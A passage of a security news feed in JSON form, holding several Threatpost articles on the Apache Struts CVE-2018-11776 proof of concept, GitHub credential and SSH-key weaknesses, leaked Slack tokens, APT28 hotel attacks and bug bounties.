exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. 
The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. 
We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. 
~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believed to be implicated, stolen from sites running outdated vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. 
LeakedSource published a top 10 list of the most common passwords and an unusual number of gibberish, complex passwords were included (18atcskd2w was used on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. 
[Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatpost. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. 
The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. 
\u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. 
Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said. \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who has researched and architected cloud solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. 
If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access the cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lock down their Simple Storage Service (S3) buckets, Peterson said Wednesday. 
If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local 
network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. 
[Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. 
Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u201cWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201d he said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. 
The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on an 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plug a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs, which discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. 
Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. 
Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its position on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would be seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to the press, Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. 
Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and it\u2019s designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. 
By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 
9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processor by today\u2019s standards), and then a few more minutes to transform those back into an SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on an i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. 
That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. 
Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote the report\u2019s authors, Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce a foothold was established in the hotel\u2019s Wi-Fi system, the attackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThe username and hashed password captured from hotel guests are cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. 
\u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the 
past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. 
